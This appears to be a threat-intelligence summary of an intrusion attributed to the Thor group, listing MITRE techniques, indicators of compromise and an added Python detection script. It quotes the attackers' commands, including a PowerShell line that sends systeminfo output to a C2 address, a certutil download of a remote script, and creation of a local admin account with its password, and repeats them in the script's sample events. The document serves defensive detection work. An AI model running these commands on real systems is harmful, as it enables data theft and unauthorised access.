During investigation, a noisy secondary group using well-known tools (PowerShell, certutil, ADRecon, GodPotato, mimikatz, secretsdump, Rclone) conducted reconnaissance, created a local admin account, downloaded scripts from 95.142.40[.]51, and collected credentials and files, enabling early detection that likely prevented further impact. Correlation with an Angara Security report and overlap in tools and indicators led researchers to attribute the activity to Thor and note links to LockBit and Babuk. #Thor #QuietCrabs
Keypoints
- The investigated incident involved two distinct groups: QuietCrabs (less noisy) and a second, noisy group that exposed activity through well-known tools and techniques.
- The noisy actor executed PowerShell-based reconnaissance and used HTTP(s) callbacks to 95.142.40[.]51 for command-and-control and data staging.
- Attackers downloaded ADRecon to C:\users\public\ad_ru.ps1 and performed Active Directory discovery, producing ADRecon-Report-.zip for review.
- They created a local user account ‘srv’ (added to local administrators) and used GodPotato for privilege escalation.
- Credential harvesting and data extraction were performed with secretsdump, mimikatz, and Rclone; certutil was used for tool retrieval.
- Correlation with Angara Security research (August 19) and overlapping IOCs indicated attribution to the Thor group and potential ties to LockBit and Babuk, though ransomware binaries were not observed in this case.
- Noisy use of widely known utilities enabled early detection and likely prevented more severe outcomes.
MITRE Techniques
- [T1059.001] PowerShell – Used to run reconnaissance and pipeline results to a remote HTTP endpoint (‘powershell -Command $r=(systeminfo); iwr -Uri (“http://95.142.40[.]51:888/?data=” + [uri]::EscapeDataString($r)) -UseBasicParsing’)
- [T1071.001] Application Layer Protocol: HTTP – Command-and-control and data exfiltration conducted over HTTP to 95.142.40[.]51 (‘iwr -Uri (“http://95.142.40[.]51:888/?data=” + [uri]::EscapeDataString($r))’)
- [T1105] Ingress Tool Transfer – Tools and scripts were retrieved from remote hosts using certutil (‘certutil.exe -urlcache -split -f http://95.142.40[.]51:654/exec.ps1 $public\sql.ps1’)
- [T1136.001] Create Account: Local Account – Attackers created a local account and added it to administrators (‘net user srv Brooklin2025! /add’)
- [T1003] Credential Dumping – Credentials were harvested using public utilities such as secretsdump and mimikatz (‘they relied on utilities such as secretsdump and mimikatz’)
- [T1082] System Information Discovery – System information was gathered via systeminfo invoked from PowerShell (‘powershell -Command $r=(systeminfo); …’)
- [T1057] Process Discovery – Processes were enumerated using tasklist during reconnaissance (‘powershell -Command $r=(tasklist); …’)
- [T1087] Account Discovery / Active Directory Discovery – Domain and account enumeration performed with whoami /priv, nltest, and ADRecon (‘powershell -Command $r=(whoami /priv); …’ and ‘nltest /dclist:’)
- [T1068] Exploitation for Privilege Escalation – Public exploitation tool GodPotato was used to escalate privileges (‘the group used the publicly available GodPotato tool’)
- [T1567] Exfiltration Over Web Service – User files were collected with Rclone, indicating exfiltration to remote storage or services (‘To collect user files, they used Rclone.’)
Indicators of Compromise
- [IP Address] C2 and hosting infrastructure – 95.142.40[.]51:888, 95.142.40[.]51:654 (used for HTTP callbacks and downloads)
- [URL/URI] Remote retrieval and data exfiltration endpoints – http://95.142.40[.]51:888/?data=, http://95.142.40[.]51:654/exec.ps1
- [File Path / File Name] Downloaded and staged scripts and reports – C:\users\public\ad_ru.ps1, exec.ps1, sql.ps1, file:///C:/Users//Desktop/ADRecon-Report-.zip
- [Tool / Utility] Tools observed on compromised hosts – ADRecon, certutil.exe, GodPotato, secretsdump, mimikatz, Rclone (and other publicly available utilities)
- [User Account / Credential] Created local account and password observed in commands – srv / Brooklin2025! (account added to local administrators)
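The techniques and indicators above translate directly into process-creation detections. The following is an added example, not code from the PT Security report: it runs simple rules for the quoted PowerShell exfil-over-HTTP pattern, the certutil download, the net user / localgroup account creation and the nltest enumeration over constructed Sysmon-style command-line records, and flags the report's C2 address after refanging it. The event records and the example.local domain are constructed; the patterns and the 95.142.40[.]51 address come from the page.

```python
"""
Added detection example (not from the PT Security report): scan Windows
process-creation command lines for the noisy tradecraft listed above.
Rule patterns and the C2 address come from the page; the event records
below are constructed samples, not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Defanged in the report as 95.142.40[.]51; refanged here for matching.
C2_IPS: Set[str] = {"95.142.40.51"}


@dataclass
class Finding:
    technique: str   # MITRE technique id from the page, or "IOC"
    reason: str
    cmdline: str


# (technique, pattern, explanation). Patterns follow the quoted commands.
RULES = [
    ("T1059.001/T1071.001",
     re.compile(r"powershell.*\biwr\b.*\?data=", re.I),
     "PowerShell pushes command output into an HTTP query string"),
    ("T1105",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*-f\s+https?://", re.I),
     "certutil used as a downloader"),
    ("T1136.001",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
     "local account created with net user"),
    ("T1136.001",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
     "account added to local Administrators"),
    ("T1087",
     re.compile(r"\bnltest(\.exe)?\s+/dclist", re.I),
     "domain controller enumeration with nltest"),
]

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def refang(text: str) -> str:
    """Turn the report's defanged 95.142.40[.]51 form back into a real address."""
    return text.replace("[.]", ".")


def analyse(cmdline: str) -> List[Finding]:
    """Return every rule and IOC hit for one process command line."""
    findings = [Finding(t, why, cmdline) for t, pat, why in RULES if pat.search(cmdline)]
    for ip in IP_RE.findall(refang(cmdline)):
        if ip in C2_IPS:
            findings.append(Finding("IOC", f"known C2 address {ip}", cmdline))
    return findings


def triage(events: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Map each technique/IOC to the set of hosts it was seen on."""
    hits: Dict[str, Set[str]] = {}
    for ev in events:
        for f in analyse(ev["cmd"]):
            hits.setdefault(f.technique, set()).add(ev["host"])
    return hits


# Constructed sample events shaped like Sysmon Event ID 1 command lines.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmd": 'powershell -Command $r=(systeminfo); iwr -Uri '
                            '("http://95.142.40.51:888/?data=" + [uri]::EscapeDataString($r)) -UseBasicParsing'},
    {"host": "WS01", "cmd": r"certutil.exe -urlcache -split -f http://95.142.40.51:654/exec.ps1 $public\sql.ps1"},
    {"host": "SRV02", "cmd": "net user srv Brooklin2025! /add"},
    {"host": "SRV02", "cmd": "net localgroup administrators srv /add"},
    {"host": "SRV02", "cmd": "nltest /dclist:example.local"},   # constructed domain name
    {"host": "WS03", "cmd": r"powershell -Command Get-ChildItem C:\Users"},  # benign
]

if __name__ == "__main__":
    for technique, hosts in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{technique:22} {', '.join(sorted(hosts))}")
```

The rules key on command-line shape rather than on the IP alone, so they still fire if the actor rotates infrastructure; the IOC match is layered on top as a high-confidence signal for the address seen in this incident.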
Read more: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder